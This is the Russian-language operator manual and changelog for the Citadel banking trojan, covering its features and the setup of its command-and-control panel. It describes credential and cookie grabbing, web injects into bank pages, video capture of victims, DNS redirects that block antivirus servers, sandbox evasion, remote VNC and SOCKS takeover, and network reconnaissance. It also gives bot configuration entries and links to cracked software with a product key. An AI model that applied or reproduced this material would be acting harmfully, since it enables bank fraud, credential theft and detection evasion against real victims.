Citadel v1.3.4.5 -Personal Manual.txt - Original

Version 1.3.4.5
Manual Version: 2.0 (Последнее обновление 06.06.2012)

Список нововведений для бота:
[+] Фикс VNC бага на Vista/Windows 7. Теперь можно полноценно работать с Internet Explorer 8 (напомню, была проблема с рендерингом IE)
[+] Поддержка Mozilla Firefox 7.0 (решена проблема, при которой не слались отчеты в последних версиях браузера)
[+] Крипто-защита (расшифровывающая тело в памяти).
[+] Редиректы DNS (не через hosts). Можно блокировать/редиректить любые URL'ы, не опасаясь, что их заметит эвристика. Например заблокировать AV-cервера или редиректить банк-пагу на другой хост.
!BONUS! Список URL'ов популярных антивирусных программ для блокирования идет в комплекте.
[+] Информация о версии сотфа в репорте. Высылает вам подробную версию браузера холдера вместе с отчетом. Помогает, при имитации настроек холдера.
[+] Дополнительный уровень защиты сервера от трекеров - Login Key.
[+] Механизм аутинтефикации при загрузке конфигов (нет прямых урлов). Дает полноценную защиту от устоявшихся трекеров.
[+] Поддержка граббера Google Chrome. [Проверено на последней версии 15.x/16.x/17.x].
[+] Поддержка инжектов Google Chrome. [Проверено на последней версии 15.x/16.x/17.x].
[+} Добавлено кеширование поиска функций, что ускоряет установку хуков Chrome.
[+] Добавлена возможность выполнения системных CMD команд при старте бота (секция CMDList) с отправкой репорта на сервер. К примеру, нужно вам чтобы при инсталле, отправлялся результат команды "ipconfig /all", или список всех доступных шар. Полезно, при анализе внутренней структуры компаний. (например, часто попадаются боты в локалке с именами ACCOUNTANT_PC, POS_SERV, DATABASE...)
[+] Добавлен механизм проверки сохранности хуков на некоторых Windows.
[+] Эвристический анализатор окружения со стоп листом для нежелательного ПО (значительно повышает скрытность),включены все популярные антивирусы.
[+] Исправлены мелкие баги.
[+] Видео граббер. Уникальная возможность следить за работой ваших инжектов "глазами холдерами", в конфиге указываются список сайтов и длина записи видео в секундах, при заходе на заданный линк, активируется видео-запись в формате .mkv. Рекомендуется настроить свой сервер для приема файлов 10-60МБ.
[+] Убрано удаление кукисов при инсталле, т.к это сбивает "fingerprint" холдера при работе с заливами.
[+] добавлена поддержка HTTP 1.0 и расширенных хидеров (например респонз не всегда выглядит как "HTTP/1.1 200 OK", бывает "HTTP/1.1 200 follow document", в данном случае после кода 200 идет несколько слов) применимо к браузерам Firexfox & Chrome
[+] Добавлен гейт генератор (на случай, если вы хотите разместить файлы на промежуточном хосте для редиректа).
[+] Полностью переделано шифрование (передача данных, запись логов/видео, загрузка конфигов и т.д) у Citadel, на смену устаревшему RC4 используемому в Zeus, пришел AES 128. Напомню, что RC4 дал асечку, когда массово начали выпускаться различные декрипторы конфигов/инжектов для Zeus, а хосты начали палиться в abuse.ch.
Теперь помимо встроенного RC4, который шифруется с вашей персональной сигнатурой, в софт также встроено AES шифрование, на выходе мы получаем защищеное AES128 обращение бот<->гейт. Никакие ZeusDecryptor'ы(ThreatExpert) и автоматизированый реверсинг не будут помехой для вашей комфортной работы на текущий момент (Jan 2012).
[+] Весь базовый функционал, оставшийся от зевса присутствует. Думаю, не стоит его писать здесь снова.
[+] Исправлена ошибка записи репортов у веб-фильтров в конфиге с параметром "!" (игнорирование), который должен был исключать все заданные ссылки, а вместо этого делал обратное и писал их в лог.
[+] Добавлен новый параметр-фильтр в config-файл, а именно функция отсылать или не отсылать cookies на сервер.
Параметр статичного конфига disable_cookies 0/1 указывает отключить ли граббинг куков (1 - отключить, 0 - включить).
Вручную, также, кукисы можно получить командой user_cookies_get из админки, если очень нужны.
[+] Добавлена функция произвольного открытия страницы дефлотовым браузером пользователя на боте.
К примеру, если вам нужно накрутить какой-нибудь счетчик или статистику голосования или вы хотите получать доп.доход с вашего ботнета открывая страницы с шопами (а также: фарма, гемблинг, дроп-проекты и т.д..) отличный способ разрекламировать нужную страницу!
Новый параметр url_open <url>
[+] Новый вид фильтрации WebFilters в конфиг-файле при сборке.
Два новых параметра: P и G.
Параметр P указанным перед ссылкой, указывает о записи только POST запросов(все другие игнорируются) с этой ссылки.
Параметр G указывает о записи только GET запросов (все другие игнорируются) с заданной ссылки.
Параметры не комбинируются, т.е. следует указывать какой-то один из них.
[+] Добавлена модульная система в софт, что дает нам:
* Расширяемость и загрузку любого операционного функционала ботам, ориентированного для Citadel.
Все модули загружаются с сервера и распаковываются динамически в памяти, что исключает их детектирование.
Хранение и передача во внешнем мире исключительно в шифрованном виде.
Модули грузятся в целевые процесссы, поэтому весомо экономят память.
Большая управляемость - модули можно отключать через конфиг.
[+] Видео-граббер переделан на модульную основу. Теперь вес некриптованного билда <190 кб. Всегда.
[+] Добавлен новый параметр timer_modules (тайминги для загрузки модулей).
[+] Добавлена поддержка нового браузера Google Chrome 17, а также исправлен баг с обработкой Flash'a в нем.
[+] Добавлена поддержка макросов. Введены макросы: %BOTID%, %BOTNET%
* Можете вставлять в любой участок инжектов данные макросы и передавать данные на ваш сервер (АЗ/инжекты), передается имя бота и имя ботнета.
[+] Добавлены 4 команды управления модулями (включение/выключение, запрет/разрешение на скачивание).
[+] Добавлен новый параметр disable_httpgrabber 1/0 для Chrome: исключает обработку обычных HTTP (не HTTPS) запросов.
[+] Добавлена запись полного User-Agent в отчеты HTTP(S) граббера, позволяет клонировать холдерский UserAgent через любые утилиты типа CCTools.
[+] Добавлена запись разрешения экрана в отчеты HTTP(S) граббера, пример "Screen(w:h): 1600:900" - полезно при клонировании параметров холдера, многие банки на это обращают внимание.
[+] Изменен протокол отправки видео-файлов для снижения нагрузки на сервер (у некоторых были проблемы с нагрузкой на сервер и он сильно тормозил)
[+] Добавлена возможность отсылки jabber-уведомлений нескольким получателям в админке Citadel.
[+] Добавлена возможность указания нескольких url_config'ов (пути до основного конфига), раньше было так: если у вас недоступен основной конфиг в момент инсталла бота, то резервный никак не скачивался, теперь этой проблемы не будет и бот пытается стянуть конфиг с другого URL'a(можно вписать до 20 резервных).
[+] Исправлена ошибка в Google Chrome (17x) приводящая к зависанию подпроцесса, при открытии нескольких вкладок с инжектами.
[+] Добавлены новые команды:
- Получение информации об установленном ПО (список - компания|продукт|версия) на компьютере: info_get_firewall
- Получение информации об установленном антивирусе на компьютере: info_get_antivirus
- Получение информации об установленном фаерволе на компьютере: info_get_firewall
Информация идет в виде отдельного репорта для каждого бота. Скоро встроим массовую статистику по установленному софту в админку Citadel.
[+] Изменен алгоритм антиэмуляции для ряда АВ (не считается криптором, софт стал невидимым для нескольких проактивок).
[+] Исправлена проблема запуска под пользователем SYSTEM.
[+] Добавлена возможность особых Jabber-уведомлений, при обнаружении заданных ботов по маске (к примеру маска *corporate*, будет искать botid с таким совпадением), даже если они не прислали никаких логов, скрипт уведомит вас в Jabber-сообщении о появлении бота. Теперь вы не пропустите мимо глаз ценных ботов.
[+] В админке появилась новая секция "Эффективность и Безопасность", мы провели интеграцию с сервисом scan4you, и теперь вы можете одним кликом проверить все ваши ехе-билды на палевность сразу в админке Citadel, также, вы можете установить автоматическую проверку файлов раз в сутки, и если один из ваших файлов палится более чем 3я антивирусами, вы немедленно получите уведомление в ваш Jabber, чтобы вы могли
сразу заменить ехе. Теперь механизм будет работать за вас автоматически, ленитесь на здоровье!
[+] Некоторые клиенты жаловались на то, что лишь 40% ботов обновляется на новую версию ехе, остальные не могут обновиться по какой-то неизвестной причине. Действительно, баг остался еще со времен зевса, мы его исследовали и исправили. Теперь введен новый параметр в конфиге: timer_autoupdate 8
В котором задается время (в часах), как часто скачивать и перезапускать exe с сервера (RC4 ключ должен совпадать). 80% ботов теперь обновляются успешно, криптуйте и перезаливайте ехе, живучесть повысилась на 37.1%, ваши боты будут иметь самый свежий и чистый билд.
[+] Переработана система отправки отчетов на сервер, в предыдущих версиях для каждого отчета происходила единичная отправка POST запроса на гейт, в новой схеме отчеты отправляются пачкой по несколько штук, это позволяет свести до минимума количество сессий на сервере и нагрузка на сервере становится минимальной, что позволяет выдерживать большое количество ботов онлайн.
[+] Формат видео от ботов изменен на .webm(HTML5), мы встроили онлайн видео плеер в админку Citadel, теперь вы можете смотреть видео прямо в вашем брауезере(рекомендуется Opera). Из возможностей: перемотка назад-вперед/фулл-скрин/поиск видео по BotID,IP-адресу,дате.
Но этого мало и мы пошли дальше, многие из вас используют(пора уже всем использовать и разрабатывать индустрию совместно) АЗ и персональные админки для инжектов/сбора акков и т.п. Вы бы хотели из вашей админки смотреть видео по заливу или как работает ваш инжект на боте? Легко! Мы создали API-систему, теперь вы можете передать BotID или IP-адрес скрипту, а API вернет вам готовый HTML-embed код всех видео по данному боту и вы можете вставить и смотреть видео хоть на narod.ru, не заходя в админку Citadel.
[+] Добавлен удобный анализатор-парсер системных команд (CMDList) в админку, теперь вы можете посмотреть в новом формате в виде таблицы, результаты выполнения системных команд, таких как: ipconfig, список ПК в локальной сети, список процессов и т.п.
[+] Теперь при установке билда на бота, автоматически единоразово присылается в админку cледущая информация: установленные фаерволлы, установленные антивирусы, установленные программы.
Вы можете посмотреть информацию как для отдельного бота, так и для всего ботнета. Мы создали отдельный раздел, в котором вы можете посмотреть всю статистику в виде наглядного графика и подсчетов. Теперь вы знаете с кем бороться.
[+] Добавлена возможность "Избранных логов", вы можете пометить любой интересный аккаунт(отчет) при поиске данных в админке, а потом без труда найти его т.к он будет выделен отдельным цветом.
[+] Реализована совместимость инжектов с UTF-8 (теперь в инжекты можно вставлять любые языки, такие как японский, китайский и т.д)
[+] Разработана крипт-панель в админке Citadel. Это раздел в админке, который позволяет вам обновлять ехе-файл ботам, прямо из веба. В любой момент, вы можете перезакачать нужный ехе-файл и боты его своевременно скачают. Ведется история загрузок в формате: Файл | Дата Загрузки | Оплачено(Y/N)
По поводу последнего пункта, мы разделили полномочия и создали отдельную категорию пользователей с правами "криптера" - эти пользователи имеют доступ к вашей панели по вашему желанию и единственная привилегия этих пользователей - возможность обновлять ехе-файл, при этом вы можете отмечать в таблице, оплачен конкретный крипт или нет.
Можно включить jabber-уведомления по результату проверки на scan4you.
[+] Добавленны полноэкранные скриншоты (Опция в конфиге - "@@").
[+] Улучшен механизм автоапдейтинга: если вы столкнулись с проблемой большой нагрузки на сервере при обновлении(либо боты не переходят на новую админку), то этот фикс исправляет эту ситуацию. Фикс включает в себя:
- Старые репорты от прошлой версии ехе удаляются при обновлении (tmp файл), дополнительная подстраховка.
- Тяжелые отчеты (видео и прочее файловые репорты) дополнительно проверяются на корректность и удаляются в случае проблем(например, если такой файл уже закачан)
- Изменено время инициализации апдейтинга, в результате чего исклчючен deadloc и не возможность дальнейшего апдейта при какой-либо ошибке файловой системы.
[+] Исправили проблему мусорных логов в админке: убрали полное логирование Flash-роликов (swf/flv) из логов и всего Facebook, потому что огромное количество мусора идет именно от них.
[+] Модуль "Качественная проверка WebSocks" теперь встроен в админку, никаких лишних скриптов. Показывает: страну, штат, город, хостнейм, аптайм и ping lag.
Возможность входа в этот раздел без пароля, для удобства когда нужен срочно сокс smile.gif
[+] Модуль "Парсер логов" теперь встроен в админку, никаких лишних скриптов. Интерфейс значительно улучшен, добавлена возможность создания "избранных доменов", "архивных логов" и возможность парсинга https или http доменов на выбор. Выстраивается визуальная таблица всех доменов, которые фигурируют в логах.
[+] Добавлен раздел "Заметки" в админку Citadel, что-то вроде онлайн блокнота. Адаптировали интерфейс админки для планшетов iPad/Galaxy Tab.
[+] Доработали модуль "VNC-админка", теперь он встроен напрямую в админку Citadel, никаких дополнительных скриптов. Все устанавливается 1 кликом. Много новых возможностей, а именно:
- Возможность работы с API, вы передаете BotID или IP-адрес скрипту, к примеру через инжект, а он устанавливает VNC/BackConnect Socks-соединение, присылая данные для подключения вам в Jabber. Можно вызывать скрипт в любой момент времени, применимо к АЗ.
- Напротив каждого отчета в разделе "Поиск в базе данных" появилось 4 кнопки: "Добавить в избранное", "Connect VNC", "Connect BC Socks", "Autoconnect VNC", "Autoconnect BC SOCKS"
- AutoConnect VNC при включенной опции, бот будет устанавливать vnc-соединение при каждом выходе в онлайн, пока вы не отключите это.
- AutoConnect BC Socks при включенной опции, бот будет устанавливать backconnect socks соединение при каждом выходе в онлайн, остальные опции создают разовый коннект.
- Появилась возможность создавать автоматически VNC/BC SOCKS-соединение как только от бота пришел нужный аккаунт по URL-маске, разбираем горячие пирожки.
- Напротив каждого аккаунта по URL-маске пишется дата последнего входа в этот акк (last login), теперь вам не надо чекать аккаунты на активность - за вас это сделают скрипты.
- Возможность любых уведомлений в несколько Jabber'ов сразу.
[+] Исправлена проблема цепочки хуков в Chrome.
[+] При запуске user_execute с флагом "-f" принудительно переводится в режим только апдейтинга ехе и не будет запущен как инсталятор.
[+] Оптимизирована работа гейта, что позволило снизить нагрузку. Упрощена работа инсталлятора админки, что позволяет установить все модули в 1 клик.
[+] Добавлена поддержка новой версии Chrome 18 [инжекты/формграббинг]
[+] Добавлена кнопка "Все отчеты бота" в админке, позволяет просмотреть начало и конец отчетов от конкретного бота.
[+] Исправлен баг с ручной командой dns_filter_add, теперь блокировка URL'ов работает корректно.
[+] Исправлен баг с отображением ехе-файлов на главной странице, удаленные ехе теперь исчезают автоматически.
[+] Исправлен баг с работой планировщика заданий scan4you, ежедневная проверка ехе-файлов работает корректно.
[+] Добавлена единая система CRON-работы, одно cron-задание управляет теперь всеми задачами: jabber-уведомления, проверка файлов, работа модулей и т.п.
[+] Добавлена возможность удаления видео из админки.
[+] Добавлена отсылка примечания к боту в Jabber в VNC-модуле.
[+] Обновлена GeoIP база (конец 2011 года).
[+] Последний домен из AdvancedConfigs срабатывает с задержкой, сделано с целью защиты ваших резервных URL'ов от автоматического граббинга ханипотами.
[+] Исправлена работа скрипта архивирования данных в zip в админке (fsarc.php)
[+] Настройки Jabber-аккаунта и всех параметров теперь вынесены в общие настройки.
[+] Теперь можно указывать пути в конфиге с httpS:// (неподписанные сертификаты проходят)
[+] Исправлен баг с регистрозависимостью в инжектах, теперь <BODY> и <body> одинаковые сущности. Все инжекты регистронезависимые.
[+] Полностью измененый интерфейс веб-админки, user-friendly.
[+] Добавлен онлайн просмотр скриншотов из админки. Скрины выстраиваются в ряд в порядке появления, легко переключаются клавишами вперед-назад, сортируются. Нет смысла больше скачивать картинки и смотреть по одной. Виртуальные клавиатуры/страницы видно последовательно.
[+] Добавлена история отстука, вы можете посмотреть статистику отстука вашего ботнета(активных,всего,процент) за неделю, две недели или месяц.
[+] Добавлена история версий софта, вы можете посмотреть статистику по обновлениям Citadel в вашем ботнете. Будете знать сколько ботов перешло на новую версию, а сколько осталось на старой. Рисуется диаграмма.
[+] Возможность поиска логов, только по ботам, которые находятся в онлайне.
[+] Возможность поиска логов по нескольким кейвордам сразу, а также можн их сохранить как алиас и не вводить при следущем поиске заново, а просто выбрать из списка.
[+] Добавлена кнопка "Cookies" в контекстное меню по ботам, которая позволяет оперативно вывести все Cookies бота, если вы их не отключали. Экономит время.
[+] Интегрирована функция экспорта FTP-аккаунтов в API, полезно, если используете сторонний софт класса FTP-Iframer, позволяет вывести в plain-text/xml/php формате ftp-акки по нужной дате.
[+] Добавлена кнопка "Whois" в просмотре отчета, позволяет одним кликом получить всю информацию по IP-адресу отчета.
[+] Добавлена функция комментария к боту при просмотре отчета, а также времени, когда бот последний раз был онлайн.
[+] Создан новый раздел "Избранные отчеты", который позволяет сохранить быструю ссылку на нужный вам отчет + комментарий к ниму. К примеру, если вы встретили интересный аккаунт, нажимаете "добавить в избранное" и отчет будет виден в отдельном разделе, с автоматическим Whois'ом данных и вашим комментарием. Сохраняйте акки не отходя от кассы.
[+] Добавлен антиэмулятор, который позволяет защитить ваш ботнет от реверсинга и попадания в трекеры. Если при запуске, билд детектит что он был запущен в виртуальной машине или песочнице CWSandbox, VMware, Virtualbox, Sandbox он начинает вести себя по-другому и ваш ботнет останется незамеченным. Подробности не раскрываются, т.к анонс находится в паблике и технология очень хитрая.
Из минусов: не сможете протестировать работу в Vmware, придется делать это на реальном ПК или дедике. Опция вынесена в конфиг. antiemulation_enable 0/1
[+] Добавлено отображение статуса бота "Online/Offline" при просмотре отчета.
[+] Одна из самых главных фич: предпросмотр отчета при поиске логов. Не нужно больше открывать 200 окон в браузере, чтобы просмотреть каждый отчет и каждую ссылку. Теперь можно легко нажав на один отчет сделать предпросмотр, а если отчет будет интересен, то просмотреть полную версию.
Поддерживается быстрое переключение между отчетами клавишами назад-вперед-ESC.
[+] Обновлён скрипт cronjob очистки старых скриптов(команд). Теперь должен у всех работать без багов.
[+] Добавлена в контекстное меню опция "Скриншоты бота"
[+] Модуль VNC-админки: добавлена сортировка по дате последнего соединения / ОС (К примеру, если нужно только WinXP).
[+] Модуль парсер логов: добавлена сортировка по домену / количеству отчётов в порядке убывания.
[+] Модуль FTP-ифреймер: исправлен баг с "умным" ифреймингом, когда кавычки в iframe-коде экранировались. Текущим владельцам, рекомендуется перезалить скрипт-прокладку.
[+] Поскольку предыдущий алгоритм шифрования был взломан спустя несколько месяцев, из-за этого некоторые клиенты попадали в ZeusTracker. Мы разработали и внедрили новый алгоритм шифрования на основе модифицированного RC4. В шифровании используется особый ключ, известный только клиенту. что требует его наличия для расшифровки. Поскольку у каждого клиента свой индвидуальный ключ, теперь от одного клиента не будут страдать все остальные. Если попал один, другие будут от этого защищены. Сейчас мы полностью изолированы от автоматического анализа билдов. В итоге получаем 2 уровня авторизации-защиты бота от трекеров.
[+] Сделали подрезание опции X-Frame-Options в Header'ах, т.к она может мешать некоторым инжектам в работе.
[+] Проделана огромная работа для корректного формграббинга/инжектинга в Chrome 19 (19.0.1084.52m)
[+] Ускорена работа на больших ботнетах админ.интерфейса + гейта засчет оптимизации функционала GeoIP-базы.

----------------------------------------------------------------------------
ДЛЯ УПРОЩЕНИЯ ПОНИМАНИЯ ИНФОРМАЦИИ, ВЫ МОЖЕТЕ ПРОПУСТИТЬ РАЗДЕЛЫ,
ГДЕ ОПИСАНА УСТАНОВКА И ИСПОЛЬЗОВАНИИ МОДУЛЕЙ, КОТОРЫЕ ВЫ НЕ ПРИОБРЕТАЛИ
ИСПОЛЬЗУЙТЕ CTRL+F ДЛЯ ПОИСКА КЛЮЧЕВЫХ СЛОВ И ОПРЕДЕЛЕНИЙ.
ПРИМЕРНЫЙ АДЕКВАТНЫЙ СРОК ПОНИМАНИЯ ВСЕХ ФУНКЦИЙ СОФТА - 1 НЕДЕЛЯ.
----------------------------------------------------------------------------

1) Доступ в CRM

http://citadelmovement.com/crm/
Сначала citadel;rightway
потом
Login: XXXXXXXXXXXXX
Password: XXXXXXXXXXXXX

Что такое Citadel CRM Store?
Это система взаимодействия между нашими клиентами и разработчиком.
Наверное, вам знакома ситуация, когда саппорт продукта игнорит ваши запросы в icq/jabber'e - этому способствует высокая нагруженность человека, который отвечает за все это, потому что клиентов много, а он один, да еще и занят делами.
С нами такая проблема не актуальна. Специально для вас была разработана система, благодаря которой, вы можете незамедлительно сообщить о баге в софте, а мы в свою очередь оперативно его пофиксим, если таковой имеется. Все запросы поступают нескольким людям одновременно, с уведомлениями по jabber/sms. Вы довольно быстро получите ответ внутри тикет-системы.

У вас возникла замечательная идея для доработки софта и вы хотите ею поделиться с разработчиком (пусть это даже самая маленькая идея: к примеру вам не нравится иконка в меню) - мы идем вам навстречу.
Вы можете создать 2 вида заявок(читайте-проектов) внутри CRM:

а) публичная заявка - это заявка с темой + описанием(лучше прикладывать ТЗ), которую будут видеть все клиенты, они могут ее обсудить в комментариях, предложить свою цену за реализацию и голосовать: нужна ли эта заявка или отправляем ее в треш.
Вы можете создавать данные виды заявок, а можете голосовать и делать любые действия относительно других заявок наших клиентов.

б) приватная заявка - если вы хотите предложить нашим разработчикам индвидуальную задачу и хорошую цену за реализацию, то этот вид заявки для вас. Его может видеть только разработчики(т.е мы) и вы. Если все условия устраивают обе стороны, данный модуль получаете только вы.

Все актуальные заявки, вы можете видеть в разделе "На обсуждении"
Право голоса имеет 4 значения:
Нужен, я приобретаю
Полезен, но мне не нужен
Абсолютно не нужен
Не нужен, я не приобретаю

Пожалуйста, если вы увидели новую заявку - проголосуйте за нее, даже если она вам вообще не нужна! У нас очень узкий круг, поэтому именно ВАШЕ мнение является решаюшим для ВСЕХ, не оставайтесь в стороне.

О любых событиях внутри CRM(решения, заявки, комментарии) вы будете уведомлены ботом по jabber-каналу. Это сделано для вашего удобства, чтобы вам не рефрешить каждый раз страницу. Но все равно, полезно заходить раз в 3 дня в СRM'ку =) Чем быстрее идут голоса и мнения - тем оперативнее развивается наш продукт.

Если заявка набирает много отказных голосов, она идет в раздел "Отклоненные заявки" и закрывается.
Если заявка одобряется разработчиками, она идет в раздел "В разработке"
По каждой заявке в этом разделе, мы вносим изменения в формате: дата - что сделано
Чтобы вы видели процесс работы над модулем.
Не забудьте указать желаемую объявленную цену на модуль, за которую вы бы оценили доработку.
Все новости мы публикуем в разделе "Новости", если вам не приходят уведомления в Jabber, пожалуйста, немедленно сообщите об этом в саппорт!
Заходите раз в 3-4 дня в СРМ и проверяйте новости и комментарии к заявкам.

2) Список полезных ссылок, которые помогут вам:
 1) VMWare Workstation 6.5.0 + VMWare Tools + Crack:
 http://www.citadelmovement.com/software/VMware-workstation-6.5.0-118166.exe
 2) Образ англоязычной Windows XP SP3 (Corporate Edition):
 http://www.citadelmovement.com/software/Microsoft_C2AE_Windows_XP_SP3_Corporate.iso
 Key: MXDJT-W3TCG-2KGQH-YPMK3-F6CDG
 3) Комплект разработчика для создания инжектов + примеры (автор неизвестен):
 http://www.citadelmovement.com/software/injects_development.zip

3) Установка Citadel

Папки:
builder - комплект билдера
backconnect - софт для BackConnect VNC админки, а именно php скрипты для Backconnect Windows сервера.
webserver(Либо server[php] - админка, гейт


********************************************************************************
==========================>>>>> Step-By-Step установка Citadel
********************************************************************************

********************
>>>>>>>>>> Требования к серверу.
********************

PHP >5.3, Mysql 5 (желательно последняя версия)
cron, apache. По желанию nginx и панель управления cPanel или DirectAdmin.
+ Windows VPS если приобретали VNC админку (о модуле чуть ниже)


********************
>>>>>>>>>> Шаг 1
********************

При запуске builder.exe, будет строчка
Ключ авторизации: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Это ваш индвидуальный ключ для защиты от трекеров (мы его называем еще LOGIN KEY)
Его нужно поместить в файл webserver/system/global.php, в котором содержится строчка
define('BO_LOGIN_KEY', 'PUT_KEY_HERE');
Вставляем этот ключ сюда, т.е получается
define('BO_LOGIN_KEY', 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX');

ОЧЕНЬ ВНИМАТЕЛЬНО ЭТОТ МОМЕНТ ПРОВЕРЯЕМ!!! В 80% СЛУЧАЕВ КЛИЕНТЫ ПРОСТО ЗАБЫВАЮТ ВПИСАТЬ СЮДА СВОЙ КЛЮЧ ИЗ БИЛДЕРА В GLOBAL.PHP И ПОЭТОМУ БОТ НЕ СТУЧИТ В АДМИНКУ. ПРОВЕРЯЕМ ЭТОТ МОМЕНТ ВНИМАТЕЛЬНО!! ЕСЛИ КЛЮЧ УЖЕ ВПИСАН, ЗНАЧИТ ВСЕ ХОРОШО.

Потом ставим chmod 777 на папку:
system
system/data

Также, необходимо поставить перед установкой chmod 777 на всю папку webserver, после полной установки - вернуть права папки на chmod 755

После этих проделанных действий, открываем файлик webserver/api.php
и меняем строчку define('API_TOKEN_KEY', 'changethispassword');

на любой произвольный пароль, к примеру define('API_TOKEN_KEY', 'dgwd23gwegw');

Это нужно чтоб вы были защищены от взлома и вас не скомпрометировали через скрипт API, поменяйте дефлотовый пароль.

********************
>>>>>>>>>> Шаг 2
********************

Идем на http://www.htaccesstools.com/htpasswd-generator/
Вводим любое имя-пароль, выдается строчка типа a:$apr1$HE/llFvK$u3YAEGm277SkotywpTl9w/
Сохраняем эту строчку в файл .htpasswd в директории webserver
После чего создаем новый файл .htaccess    в директории webserver
Туда пишем:

<Files cp.php>
AuthName "Your ID"
AuthType Basic
AuthUserFile /put/do/faila/.htpasswd
require valid-user
</Files>

Где /put/do/faila/.htpasswd - заменяем на свой конечный unix-путь.

Теперь при заходе на админку cp.php, будет дополнительная защита по паре логин-пароль.
Можно сделать по-другому и не создавать .htpasswd, а просто создать файл .htaccess и вписать туда строчки:

<Files cp.php>
Order Deny,Allow
Deny from all
Allow from 111.111.106.111
</Files>

Где 111.111.106.111 - ваш постоянный IP, теперь админка будет доступна только с вашего IP.
Какой из способов вам удобнее - выбирать вам.

********************
>>>>>>>>>> Шаг 3
********************

Откроем файл config.txt и рассмотрим НОВЫЕ настройки, старые настройки унаследованные от зевса остались неизменными, поэтому не будем заострять на них внимание.

  entry "Video"
    quality 1
    length 60
  end

Секция для настроек видеограббера: length длина каждого видео в секундах, рекомендуется указывать не более 10 минут (600 секунд) т.к образуются весьма увесистые файлы.
Quality - от 1 до 5, качество видео. Рекомендуется оставить 1 по умолчанию, чтобы сэкономить на размере видео файлов.
Видео запись срабатывает при заходе на нужный нам линк и снимается ровно length-секунд.
Чтобы задать нужные нам маски для съемки, переходим в раздел  entry "WebFilters"
  "#*paypal.com/*"

  символ # перед маской является активацией съемки.

Секция очень тонкая, потому что довольно сильно нагружает сервер, указывайте как можно точную маску и только на очень нужные вам ссылки(к примеру банк.акки)
Рекомендуется настроить сервер apache & php - для приема файлов более 50 MB через POST.
Руководство по настройке сервера лежит здесь# http://jdownloads.ru/faq/8-how-uploadbigfiles.html
Тестируйте внимательно съемку видео НЕ на виртуальних машинах, т.к в связи с отсутствием нужных кодеков, может быть такое, что на виртуалках не будет сниматься видео.

Видео складываются в формате .webm, в папку _reports/*BOTNAME*/videos/
Их можно найти через поиск файлов в админке, либо просмотреть через онлайн плеер (раздел "Просмотр Видео"). Рекомендуется просматривать в браузере Opera и Firefox, остальные браузеры не тестировались.

 entry "CmdList"
    "hostname"
    "net view"
    "ipconfig /all"
  end

Список системных команд, который бот исполнит при первом запуске 1 раз на системе и пошлет в админку.
В админке, можно найти результат команд как тип отчета "Результат CMD-команды"
С ним будет список: бот - результат выполнения команды
в удобном формате (Раздел CMD-Парсер)

  encryption_key "key"
  Обязательно здесь задаем свой произвольный ключ, это RC4 ключ он же Encryption Key - вы его задаете при установке админки в инсталлере, поменять его можно в разделе Параметры. Он должен быть не слишком сложный и не слишком простой, совпадать в конфиге и в админке. НЕ РЕКОМЕНДУЕТСЯ СТАВИТЬ БОЛЕЕ 10 СИМВОЛОВ! ЖЕЛАТЕЛЬНО ИСПОЛЬЗОВАТЬ НИЖНИЙ РЕГИСТР И БЕЗ СПЕЦСИМВОЛОВ!

 entry "DnsFilters"
    "microsoft.com=127.0.0.1"
    "myspace.com=127.0.0.1"
    "gruposantander.es=127.0.0.1"
  end

Возможность создать DNS-редирект или заблокировать AV-сервер или нежелательный урл(например, если вы обнаружили, что в логах загрузки идут еще кому-то и нужно заблокировать чей-то гейт).
Указывается IP-адрес для редиректа.
ДНС Редирект работает не только для браузеров, а для всего софта, который будет стучаться на данный домен. Все эти запросы будут перенаправлены на ваш IP.

Теперь важно!!! Полученный БИЛД конфига, ехе файл и файл видео.модуля (чтобы создать его, нужно нажать кнопку Собрать модули), мы кладем в папку webserver/files/
В итоге у нас получается 3 файла в папке files. Конфиг, видео.модуль, ехе-файл. Не забудьте закриптовать ехе-файл перед тем как поместить его в папку, иначе будет такое, что по таймеру автообновления, боты начнут скачивать ехе, который палится.

 url_config1 "http://localhost/file.php|file=test_config.bin"
  Указываем здесь test_config.bin - название нашего конфига, который мы залили в files/ с учетом того, где лежит файл file.php (а лежит он выше папки files). Символ | вас не должен смущать, он тут специально.

 url_config1 указывать обязательно, можно также вписать несколько резервных конфиг-урлов, на случай если первый домен пока вы спите ушел в даун, т.к боты не дойдут до вашего конфига, если не смогут скачать основной конфиг.
 В этом случае пишем еще одну строчку под url_config1:

 url_config2 "http://localhost/file.php|file=test_config.bin"
 Указывать не обязательно. Но таких можно указывать до 20 резервных конфигов, бот поочередно будет стучаться на каждый из урлов пока не установит себе конфиг-файл. На самый последний url_config бот стучит с задержкой, через 5 часов, это сделано для защиты от автоматического парсинга урлов реверсерами.


 url_loader "http://localhost/file.php|file=test_bot.exe"
  test_bot.exe - здесь указываем название ехе-файла, который лежит в папке files/
  Файл file.php не переименовываем, оставляем с таким же именем. Путь дo file.php, папка files/ лежит рядом с файлом.

   url_server "http://localhost/gate.php"
   Здесь указываем путь до gate.php

   Остальное настраивается как зевс, если забыли формат, читайте мануал от зевса zeus_old.txt

С появлением 1.3.0.0 версии появлась необходимость собирать модули (например видеограббер) для билда, т.к боты будут выкачивать необходимые модули с вашего сервера.
Поэтому после того как собрали ехе, жмем кнопку "Создать модули" и закачиваем получившийся файл/файлы в папку webserver\files на сервере. ЭТО ПРОДЕЛЫВАТЬ ОБЯЗАТЕЛЬНО! ДАЖЕ ЕСЛИ ВЫ НЕ ИСПОЛЬЗУЕТЕ ВИДЕО.МОДУЛЬ! ИНАЧЕ БОТ НЕ БУДЕТ СТУЧАТЬ В АДМИНКУ.


  После того, как мы закачали файлы в files и залили всю папку в целом webserver + создали БД.
  Идем по адресу: http://www.vash-host.com/citadel/install
  И вписываем все значения, после чего удаляем каталог install.


********************************************************************************
==========================>>>>> Установка BackConnect Windows сервера (необходимо для функционирования VNC-админки)
********************************************************************************

Для установки серверной части, нужен Windows VPS/Dedicated желательно XP,2003,2008
Ставим веб-сервер XAMPP/WAMP, либо любой другой с поддержкой PHP. Отключаем UAC+Windows Firewall, чтобы можно было открывать порты. А также отключим политику доменов и выйдем полностью из любого домена.
Заливаем в веб-директорию комплект скриптов backconnect\winserv_php_gate
Веб-админка будет по адресу: http://ip-serv/control.html
В ней будет лог по VNC коннектам.
Возможные проблемы: из-за виндового фаерволла, проверьте этот момент очень внимательно. Не забудьте перезагрузить Windows после отключения фаерволла.
Все скрипты должны лежать в корне на сервере, никаких папок не создавать.
